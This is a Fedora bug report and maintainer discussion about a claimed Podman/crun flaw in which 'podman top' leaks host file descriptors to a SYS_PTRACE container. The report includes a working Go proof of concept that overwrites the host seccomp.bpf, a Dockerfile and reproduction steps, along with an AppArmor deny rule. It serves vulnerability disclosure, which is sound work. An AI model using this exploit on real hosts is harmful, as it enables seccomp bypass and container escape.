Bug 2345676

Summary:	A vulnerability in Podman and crun allows containers with SYS_PTRACE to hijack host file descriptors (e.g., seccomp.bpf via /proc/[pid]/fd) during podman top execution, enabling seccomp bypass and container escape in all environments.
Product:	[Fedora] Fedora	Reporter:	m202372036
Component:	podman	Assignee:	Lokesh Mandvekar <lsm5>
Status:	CLOSED UPSTREAM	QA Contact:	Fedora Extras Quality Assurance <extras-qa>
Severity:	medium	Docs Contact:
Priority:	unspecified
Version:	rawhide	CC:	bbaude, debarshir, dwalsh, go-sig, gscrivan, jnovy, lsm5, m202372036, mboddu, mheon, nsella, patrick, pholzing, suraj.ghimire7
Target Milestone:	---	Keywords:	Reopened
Target Release:	---
Hardware:	x86_64
OS:	Linux
Whiteboard:
Fixed In Version:		Doc Type:	If docs needed, set a value
Doc Text:		Story Points:	---
Clone Of:		Environment:
Last Closed:	2025-02-18 17:01:16 UTC	Type:	---
Regression:	---	Mount Type:	---
Documentation:	---	CRM:
Verified Versions:		Category:	---
oVirt Team:	---	RHEL 7.3 requirements from Atomic Host:
Cloudforms Team:	---	Target Upstream Version:
Embargoed:

Description m202372036 2025-02-14 05:25:02 UTC

The 'podman top' command displays the processes running in a container. For security reasons, this command has
dedicated logic for containers that have been granted the SYS_PTRACE capability. However, this logic is still vulnerable and
allows an adversary to escape from the container. Specifically, when the container has SYS_PTRACE, 'podman top' calls
'crun exec' to run 'ps' inside the container. 'crun exec' launches a 'crun' process and joins it to the container's
namespaces. Unfortunately, the file descriptors that this process opened before joining the container remain visible to
processes inside the container. One of these file descriptors points to the file
`/run/user/1000/crun/[CONTAINER_ID]/seccomp.bpf`, and an adversary with SYS_PTRACE in the container can modify this file via
'/proc/[crun-pid]/fd' to disable the seccomp restrictions. Moreover, many other channels under '/proc/[crun-pid]' can be
used to escape from a rootful container, for example by overwriting entries under '/proc/[crun-pid]/map_files'. Note that
this attack affects both rootful and rootless environments.

Threat Model
A container-based platform can use Podman as its container engine and expose interfaces that wrap common
commands (e.g., run, cp, exec, top) so that its users can manage their containers. We assume that adversaries on such a
platform attempt to escape from their containers and can ask the platform, through the legitimate interface,
to execute commands in their containers. When the platform performs 'podman top', the adversary can exploit this
vulnerability to bypass seccomp and gain more privileges.
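
Since the whole scenario depends on the container holding SYS_PTRACE, a platform may want to check for that capability before acting on a container's behalf. The Go sketch below decodes the CapEff mask from a '/proc/[pid]/status' dump and tests bit 19, which is CAP_SYS_PTRACE in linux/capability.h. The helper names parseCapEff and hasCap are assumptions made for this example and do not come from Podman.

```go
package main

import (
	"bufio"
	"fmt"
	"os"
	"strconv"
	"strings"
)

// capSysPtrace is the bit number of CAP_SYS_PTRACE in linux/capability.h.
const capSysPtrace = 19

// parseCapEff extracts the effective capability mask from the text of a
// /proc/[pid]/status file. Hypothetical helper for illustration only.
func parseCapEff(status string) (uint64, error) {
	sc := bufio.NewScanner(strings.NewReader(status))
	for sc.Scan() {
		line := sc.Text()
		if strings.HasPrefix(line, "CapEff:") {
			hexMask := strings.TrimSpace(strings.TrimPrefix(line, "CapEff:"))
			return strconv.ParseUint(hexMask, 16, 64)
		}
	}
	return 0, fmt.Errorf("no CapEff line found")
}

// hasCap reports whether the capability with the given bit number is set.
func hasCap(mask uint64, capNum uint) bool {
	return mask&(uint64(1)<<capNum) != 0
}

func main() {
	data, err := os.ReadFile("/proc/self/status")
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	mask, err := parseCapEff(string(data))
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	fmt.Printf("CapEff=%#x CAP_SYS_PTRACE=%v\n", mask, hasCap(mask, capSysPtrace))
}
```

Run inside the container, this prints whether the calling process currently holds SYS_PTRACE in its effective set.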



Environment

Client:       Podman Engine
Version:      5.0.0-dev
API Version:  5.0.0-dev
Go Version:   go1.20.3
Git Commit:   7cb0c2ef0997bcd04159584d9801256352ec5e3a
Built:        Fri Feb  2 09:38:19 2024
OS/Arch:      linux/amd64

crun version 1.14.0.0.0.9-199a
commit: 199a32fec3a092d73660675012dfe20506a35d69
rundir: /run/user/1000/crun
spec: 1.0.0
+SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +YAJL



Reporters

Zhenchen Wang, Huazhong University of Science and Technology

Zhi Li, Huazhong University of Science and Technology

Weijie Liu, Nankai University

XiaoFeng Wang, Indiana University Bloomington


Reproducible: Always

Steps to Reproduce:
We assume that the adversary takes control of a container with the SYS_PTRACE capability. This container is restricted by
seccomp, and syscalls such as 'add_key' cannot be executed in this container.

1. The adversary creates a malicious image containing the exploit code (poc.go) and a new seccomp file
(seccomp-replace.bpf) that allows the add_key syscall to be used.

* cat <<EOF > poc.go
package main

import (
    "fmt"
    "io/ioutil"
    "os"
    "strconv"
    "strings"
)

func main() {
    // Loop through all processes to find one whose cmdline includes crun
    var found int
    for found == 0 {
        pids, err := ioutil.ReadDir("/proc")
        if err != nil {
            fmt.Println(err)
            return
        }
        for _, f := range pids {
            fbytes, _ := ioutil.ReadFile("/proc/" + f.Name() + "/cmdline")
            fstring := string(fbytes)
            if strings.Contains(fstring, "crun") {
                fmt.Println("[+] Found the PID:", f.Name())
                fmt.Println(fstring)
                found, err = strconv.Atoi(f.Name())
                if err != nil {
                    fmt.Println(err)
                    return
                }
            }
        }
    }

    fdPath := fmt.Sprintf("/proc/%d/fd", found)
    fds, err := ioutil.ReadDir(fdPath)
    if err != nil {
        fmt.Println(err)
        return
    }
    fmt.Println("[+] Open file descriptors:")
    for _, fd := range fds {
        linkPath, err := os.Readlink(fdPath + "/" + fd.Name())
        if err != nil {
            fmt.Println(err)
        }
        fmt.Printf("   %s: %s\n", fd.Name(), linkPath)
        if strings.Contains(linkPath, "seccomp") {
            writeHandle, _ := os.OpenFile(fdPath + "/" + fd.Name(), os.O_WRONLY|os.O_TRUNC, 0644)
            if int(writeHandle.Fd()) > 0 {
                fmt.Println("[+] Successfully got write handle", writeHandle)
                content, _ := ioutil.ReadFile("/home/seccomp-replace.bpf")
                writeHandle.Write(content)
                return
            }
        }
    }
}
EOF



* cat <<EOF > add_key.json
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "names": ["add_key"],
      "action": "SCMP_ACT_ALLOW"
    }
  ]
}
EOF

* podman create -it --name=add_key --security-opt seccomp=add_key.json golang /bin/bash && podman start add_key
* mv /run/user/1000/crun/$(podman inspect -f '{{.Id}}' add_key)/seccomp.bpf ./seccomp-replace.bpf
* cat <<EOF > add_key.c
#define _GNU_SOURCE
#include <keyutils.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

int main() {
    /* Add a small "user" key to the thread keyring; seccomp decides whether this succeeds. */
    key_serial_t keyring = KEY_SPEC_THREAD_KEYRING;
    const char *key_type = "user";
    const char *key_desc = "my_key";
    const char *key_data = "my_data";
    size_t key_size = strlen(key_data);

    key_serial_t key = add_key(key_type, key_desc, key_data, key_size, keyring);
    if (key < 0) {
        perror("add_key");
        exit(EXIT_FAILURE);
    }
    printf("Key created successfully with ID: %d\n", key);

    return 0;
}
EOF

* cat <<EOF > Dockerfile
FROM docker.io/library/golang:latest
WORKDIR /home
COPY poc.go poc.go
COPY add_key.c add_key.c
RUN go build poc.go
RUN apt-get update && apt-get install -y libkeyutils-dev && gcc add_key.c -o add_key -lkeyutils
COPY seccomp-replace.bpf /home/seccomp-replace.bpf
WORKDIR /home/
EOF

* podman build -f Dockerfile -t poc

This image has been pushed to Docker Hub as 'docker.io/plucky923/podmanfdpoc:v1'.
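
As a side note on the add_key.json profile used in step 1, the Go sketch below shows one way to look up which action such a JSON profile assigns to a given syscall. It is a deliberate simplification: it only reads the "defaultAction", "names", and "action" fields that appear in the profile above, returns the first matching rule, and ignores everything else a real profile may contain (argument filters, architectures, and so on). The type and function names are assumptions for this example.

```go
package main

import (
	"encoding/json"
	"fmt"
	"os"
)

// seccompRule and seccompProfile model only the fields used in add_key.json.
type seccompRule struct {
	Names  []string `json:"names"`
	Action string   `json:"action"`
}

type seccompProfile struct {
	DefaultAction string        `json:"defaultAction"`
	Syscalls      []seccompRule `json:"syscalls"`
}

// actionFor returns the action of the first rule naming the syscall,
// or the profile's default action when no rule names it.
// Hypothetical helper for illustration only.
func actionFor(profileJSON []byte, syscallName string) (string, error) {
	var p seccompProfile
	if err := json.Unmarshal(profileJSON, &p); err != nil {
		return "", err
	}
	for _, rule := range p.Syscalls {
		for _, name := range rule.Names {
			if name == syscallName {
				return rule.Action, nil
			}
		}
	}
	return p.DefaultAction, nil
}

func main() {
	// The profile from step 1 of this report.
	profile := []byte(`{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {"names": ["add_key"], "action": "SCMP_ACT_ALLOW"}
  ]
}`)
	action, err := actionFor(profile, "add_key")
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	fmt.Println("add_key:", action)
}
```

For the profile above, both the explicit rule and the default action allow add_key, which is why the seccomp.bpf generated from it can serve as the permissive replacement.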

2. The adversary runs a container from the malicious image on a container-based cloud platform. ([administrator]
marks commands executed outside the container, and [attacker] marks commands executed inside
the container.)

* [administrator] podman run -it --name=poc --cap-add=SYS_PTRACE docker.io/plucky923/podmanfdpoc:v1 /bin/bash

At this point, the adversary cannot execute the add_key syscall, which seccomp prohibits in the container.

* [attacker] ./add_key

The adversary executes the attack code in the container.

* [attacker] ./poc

3. The adversary asks the platform to execute a command in their container.

* [administrator] podman top -l -- aux

Executing the 'podman top -l -- aux' command allows the adversary to overwrite the 'seccomp.bpf' file on the host. (If
the overwrite fails, the poc and the 'podman top -l -- aux' command need to be run again, possibly several times.) The
adversary can then ask the platform to execute the 'add_key' syscall in the container again, and this time the call
succeeds.

* [administrator] podman exec -it poc ./add_key



A video of the PoC is available here:

https://drive.google.com/file/d/1PZjrKKu8gSCBL92DHQotlBwBaTHVxE2A/view?usp=sharing
Actual Results:  
Containers can escape seccomp restrictions

Expected Results:  
1. **Podman Vulnerability Confirmation:**
   - When executing `podman top` on a container with the `SYS_PTRACE` capability, the host process (e.g., `crun`) will leak critical file descriptors (e.g., `seccomp.bpf`) into the container’s namespace.
   - Attackers can exploit this leakage to bypass seccomp filters, escalate privileges, and escape the container in **both rootless and rootful modes**.

2. **Docker Security Comparison:**
   - Docker containers with `SYS_PTRACE` **cannot** achieve similar attacks due to Docker’s default **AppArmor profile**, which explicitly restricts access to `/proc/[pid]/fd` entries. For example:
     ```
     deny /proc/**/fd/* rwxlk,
     ```
     This prevents containers from accessing or modifying host file descriptors, even if the capability is granted.

3. **Proposed Fix for Podman:**
   - Podman should close all non-essential and dangerous file descriptors before executing processes inside the container.
   - Podman should apply stricter permissions to dangerous file descriptors.

This demonstrates that while Podman attempts to handle `SYS_PTRACE` securely, the current implementation remains flawed, and Docker’s defense-in-depth approach (via AppArmor) provides stronger protection against such attacks.

We found that the "podman top" command provides dedicated code [1] to handle containers with the "SYS_PTRACE" capability in a more secure manner (as stated by the accompanying comment in the code). Does this mean Podman still cares about the security issues caused by payloads in privileged containers?

Further, our study shows that this dedicated security code is itself vulnerable and leaks host fds to the container. It is unreasonable to ignore a security issue in code that was written for security.

In this dedicated "security" code, Podman triggers crun to execute a 'ps' binary in the container, rather than calling the ps(1) utility on the host. However, host fds are leaked to the container in the process. We believe this leakage channel should be eliminated, just like the 'crun exec' commit [2] that patches 'crun' to close all fds.

For these reasons, we think our reported issue is a vulnerability that needs to be fixed.




[1] https://github.com/containers/podman/blob/main/libpod/container_top_linux.go#L240

[2] https://github.com/containers/crun/commit/f157e80374c7d8df851ee6210cfd47d5d0e9989e

Comment 1 Giuseppe Scrivano 2025-02-14 11:02:09 UTC

how many times are you going to report the same "issue" through different channels?

As I've already explained in the past, this is not a security issue, there is no way to protect the host when using CAP_SYS_PTRACE.  If you pass that capability, you know that the container payload is trusted, it is equivalent to running on the host.

You don't need such complicated attacks with SYS_PTRACE.  You can simply attach a debugger to the exec'ed process as soon as it enters the namespace and run any command from there.

It is enough you install gdb in your container, then attach the crun process as soon as it enters the PID namespace, at this point there is no seccomp profile in place as well as many other security measures (selinux, apparmor, capabilities...):

Comment 2 m202372036 2025-02-16 08:25:43 UTC

(In reply to Giuseppe Scrivano from comment #1)
> how many times are you going to report the same "issue" through different
> channels?
> 
> As I've already explained in the past, this is not a security issue, there
> is no way to protect the host when using CAP_SYS_PTRACE.  If you pass that
> capability, you know that the container payload is trusted, it is equivalent
> to running on the host.
> 
> You don't need such complicated attacks with SYS_PTRACE.  You can simply
> attach a debugger to the exec'ed process as soon as it enters the namespace
> and run any command from there.
> 
> It is enough you install gdb in your container, then attach the crun process
> as soon as it enters the PID namespace, at this point there is no seccomp
> profile in place as well as many other security measures (selinux, apparmor,
> capabilities...):

We've adhered to community protocols by reporting this twice via email, only to face repeated dismissal. Your persistent refusal to acknowledge the issue forces public discourse.

It is difficult to assume that all images used by users are so-called "trusted". In fact, even on personal computers, developers or testers need to download images from DockerHub. You cannot shift the security responsibility to users to avoid this design security issue. If this function is not designed to be secure, once a user accidentally uses a malicious image, it will inevitably cause an escape problem.

Either engineer proper safeguards for CAP_SYS_PTRACE implementations or issue unambiguous warnings in documentation. Your current posture amounts to negligence: When (not if) users encounter malicious images through routine workflows, container escapes become inevitable. Security through willful ignorance isn't security at all.

Comment 3 Giuseppe Scrivano 2025-02-17 11:57:28 UTC

Nobody is proposing to trust all the images you pull from a remote registry, I am just saying to not give capabilities to containers you don't trust.

You've proposed a complicated attack that works only when CAP_SYS_PTRACE is granted. You don't need such a complicated attack once you have CAP_SYS_PTRACE, you can attach to a process as soon as it enters the PID namespace. That is done by `podman top` as well as `podman exec` on every healthcheck.

It is a well known attack vector, there is nothing new. Just look for "cap_sys_ptrace container escape" on Google.

There is a reason why we drop some capabilities by default. If you add them back you are loosening the protection offered by the runtime. Don't grant capabilities if you don't know what you are doing.

In this case, you have added a capability like CAP_SYS_PTRACE, that turns your container into a privileged container:

--privileged
Give extended privileges to this container. The default is false.

By default, Podman containers are unprivileged (=false) and cannot, for example, modify parts of the operating system. This is because by default a container is only allowed limited access to devices. A "privileged" container is given the same access
to devices as the user launching the container, with the exception of virtual consoles (/dev/tty\d+) when running in systemd mode (--systemd=always).

A privileged container turns off the security features that isolate the container from the host. Dropped Capabilities, limited devices, read-only mount points, Apparmor/SELinux separation, and Seccomp filters are all disabled. Due to the disabled
security features, the privileged field should almost never be set as containers can easily break out of confinement.

Comment 4 Giuseppe Scrivano 2025-02-18 17:01:16 UTC

documented upstream that there is a risk involved using these capabilities: https://github.com/containers/podman/pull/25348

Thanks